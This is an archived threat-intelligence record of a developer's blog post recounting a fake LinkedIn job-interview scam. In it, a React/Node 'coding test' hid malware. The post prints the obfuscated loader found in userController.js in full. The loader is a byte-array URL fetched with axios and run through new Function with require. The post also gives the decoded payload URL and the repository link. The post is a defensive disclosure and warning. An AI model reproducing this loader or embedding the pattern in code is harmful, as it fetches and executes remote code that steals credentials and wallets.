{
	"id": "d86df2eb-6319-43b2-a575-6e664d7f9435",
	"created_at": "2026-04-06T00:09:39.652494Z",
	"updated_at": "2026-04-10T03:21:46.583249Z",
	"deleted_at": null,
	"sha1_hash": "85f1bf8dd79c86d0e35da99b994bcfbb9c17a506",
	"title": "How I Almost Got Hacked By A 'Job Interview'",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 10488163,
	"plain_text": "How I Almost Got Hacked By A 'Job Interview'\r\nBy David Dodda\r\nPublished: 2025-10-15 · Archived: 2026-04-05 20:36:20 UTC\r\nI was 30 seconds away from running malware on my machine.\r\nThe attack vector? A fake coding interview from a \"legitimate\" blockchain company.\r\nHere's how a sophisticated scam operation almost got me, and why every developer needs to read this.\r\nThe Setup\r\nLast week, I got a LinkedIn message from Mykola Yanchii. Chief Blockchain Officer at Symfa. Real company.\r\nReal LinkedIn profile. 1,000+ connections. The works.\r\nThe message was smooth. Professional. \"We're developing BestCity, a platform aimed at transforming real estate\r\nworkflows. Part-time roles available. Flexible structure.\"\r\nI've been freelancing for 8 years. Built web applications, worked on various projects, done my share of code\r\nreviews. I'm usually paranoid about security - or so I thought.\r\nThis looked legit. So I said yes to the call.\r\nThe Hook\r\nBefore our meeting, Mykola sent me a \"test project\" - standard practice for tech interviews. A React/Node\r\ncodebase to evaluate my skills. 30-minute test. Simple enough.\r\nThe Bitbucket repo looked professional. Clean README. Proper documentation. Even had that corporate stock\r\nphoto of a woman with a tablet standing in front of a house. You know the one.\r\nHere's where I almost screwed up: I was running late for our call. Had about 30 minutes to review the code. So I\r\ndid what lazy developers do - I started poking around the codebase without running it first.\r\nUsually, I sandbox everything. Docker containers. Isolated environments. But I was in a rush.\r\nI spent 30 minutes fixing obvious bugs, adding a docker-compose file, cleaning up the code. Standard stuff. Ready\r\nto run it and show my work.\r\nThen I had one of those paranoid developer moments.\r\nThe Save\r\nBefore hitting npm start , I threw this prompt at my Cursor AI agent:\r\nhttps://blog.daviddodda.com/how-i-almost-got-hacked-by-a-job-interview\r\nPage 1 of 10\n\n\"Before I run this application, can you see if there are any suspicious code in this codebase? Like reading files it\r\nshouldn't be reading, accessing crypto wallets etc.\"\r\nAnd holy sh*t.\r\nSitting right in the middle of server/controllers/userController.js was this beauty:\r\n//Get Cookie\r\n(async () =\u003e {\r\n const byteArray = [\r\n 104, 116, 116, 112, 115, 58, 47, 47, 97, 112, 105, 46, 110, 112, 111, 105,\r\n 110, 116, 46, 105, 111, 47, 50, 99, 52, 53, 56, 54, 49, 50, 51, 57, 99, 51,\r\n 98, 50, 48, 51, 49, 102, 98, 57\r\n ];\r\n const uint8Array = new Uint8Array(byteArray);\r\n const decoder = new TextDecoder('utf-8');\r\n axios.get(decoder.decode(uint8Array))\r\n .then(response =\u003e {\r\n new Function(\"require\", response.data.model)(require);\r\n })\r\n .catch(error =\u003e { });\r\n})();\r\nObfuscated. Sneaky. Evil. And 100% active - embedded between legitimate admin functions, ready to execute\r\nwith full server privileges the moment admin routes were accessed.\r\nI decoded that byte array: https://api.npoint.io/2c458612399c3b2031fb9\r\nWhen I first hit the URL, it was live. I grabbed the payload. Pure malware. The kind that steals everything - crypto\r\nwallets, files, passwords, your entire digital existence.\r\nHere's the kicker: the URL died exactly 24 hours later. These guys weren't messing around - they had their\r\ninfrastructure set up to burn evidence fast.\r\nI ran the payload through VirusTotal - check out the behavior analysis yourself. Spoiler alert: it's nasty.\r\nThe Operation\r\nThis wasn't some amateur hour scam. This was sophisticated:\r\nThe LinkedIn Profile: Mykola Yanchii looked 100% real. Chief Blockchain Officer. Proper work history. Even\r\nhad those cringy LinkedIn posts about \"innovation\" and \"blockchain consulting.\"\r\nThe Company: Symfa had a full LinkedIn company page. Professional branding. Multiple employees. Posts\r\nabout \"transforming real estate with blockchain.\" They even had affiliated pages and follower networks.\r\nhttps://blog.daviddodda.com/how-i-almost-got-hacked-by-a-job-interview\r\nPage 2 of 10\n\nThe Approach: No red flags in the initial outreach. Professional language. Reasonable project scope. They even\r\nused Calendly for scheduling.\r\nThe Payload: The malicious code was positioned strategically in the server-side controller, ready to execute with\r\nfull Node.js privileges when admin functionality was accessed.\r\nThe Psychology\r\nHere's what made this so dangerous:\r\nUrgency: \"Complete the test before the meeting to save time.\"\r\nAuthority: LinkedIn verified profile, real company, professional setup.\r\nFamiliarity: Standard take-home coding test. Every developer has done dozens of these.\r\nSocial Proof: Real company page with real employees and real connections.\r\nI almost fell for it. And I'm paranoid about this stuff.\r\nThe Lesson\r\nOne simple AI prompt saved me from disaster.\r\nNot fancy security tools. Not expensive antivirus software. Just asking my coding assistant to look for suspicious\r\npatterns before executing unknown code.\r\nThe scary part? This attack vector is perfect for developers. We download and run code all day long. GitHub\r\nrepos, npm packages, coding challenges. Most of us don't sandbox every single thing.\r\nAnd this was server-side malware. Full Node.js privileges. Access to environment variables, database connections,\r\nfile systems, crypto wallets. Everything.\r\nThe Scale\r\nIf this sophisticated operation is targeting developers at scale, how many have already been compromised? How\r\nmany production systems are they inside right now?\r\nPerfect Targeting: Developers are ideal victims. Our machines contain the keys to the kingdom: production\r\ncredentials, crypto wallets, client data.\r\nProfessional Camouflage: LinkedIn legitimacy, realistic codebases, standard interview processes.\r\nTechnical Sophistication: Multi-layer obfuscation, remote payload delivery, dead-man switches, server-side\r\nexecution.\r\nOne successful infection could compromise production systems at major companies, crypto holdings worth\r\nmillions, personal data of thousands of users.\r\nhttps://blog.daviddodda.com/how-i-almost-got-hacked-by-a-job-interview\r\nPage 3 of 10\n\nThe Bottom Line\r\nIf you're a developer getting LinkedIn job opportunities:\r\n1. Always sandbox unknown code. Docker containers, VMs, whatever. Never run it on your main machine.\r\n2. Use AI to scan for suspicious patterns. Takes 30 seconds. Could save your entire digital life.\r\n3. Verify everything. Real LinkedIn profile doesn't mean real person. Real company doesn't mean real\r\nopportunity.\r\n4. Trust your gut. If someone's rushing you to execute code, that's a red flag.\r\nThis scam was so sophisticated it fooled my initial BS detector. But one paranoid moment and a simple AI prompt\r\nexposed the whole thing.\r\nThe next time someone sends you a \"coding challenge,\" remember this story.\r\nYour crypto wallet will thank you.\r\nIf you're a developer who has run \"coding challenges\" from LinkedIn recruiters, you should probably read this\r\ntwice.\r\nthe LinkedIn profiles\r\nhttps://blog.daviddodda.com/how-i-almost-got-hacked-by-a-job-interview\r\nPage 4 of 10\n\nhttps://blog.daviddodda.com/how-i-almost-got-hacked-by-a-job-interview\r\nPage 5 of 10\n\nhttps://blog.daviddodda.com/how-i-almost-got-hacked-by-a-job-interview\r\nPage 6 of 10\n\nMessages\r\nhttps://blog.daviddodda.com/how-i-almost-got-hacked-by-a-job-interview\r\nPage 7 of 10\n\nhttps://blog.daviddodda.com/how-i-almost-got-hacked-by-a-job-interview\r\nPage 8 of 10\n\nbit bucket\r\nhttps://blog.daviddodda.com/how-i-almost-got-hacked-by-a-job-interview\r\nPage 9 of 10\n\nhttps://bitbucket.org/0x3bestcity/test_version/src/main/ - not sure how long this will stay up though.\r\nSource: https://blog.daviddodda.com/how-i-almost-got-hacked-by-a-job-interview\r\nhttps://blog.daviddodda.com/how-i-almost-got-hacked-by-a-job-interview\r\nPage 10 of 10",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.daviddodda.com/how-i-almost-got-hacked-by-a-job-interview"
	],
	"report_names": [
		"how-i-almost-got-hacked-by-a-job-interview"
	],
	"threat_actors": [],
	"ts_created_at": 1775434179,
	"ts_updated_at": 1775791306,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/85f1bf8dd79c86d0e35da99b994bcfbb9c17a506.pdf",
		"text": "https://archive.orkl.eu/85f1bf8dd79c86d0e35da99b994bcfbb9c17a506.txt",
		"img": "https://archive.orkl.eu/85f1bf8dd79c86d0e35da99b994bcfbb9c17a506.jpg"
	}
}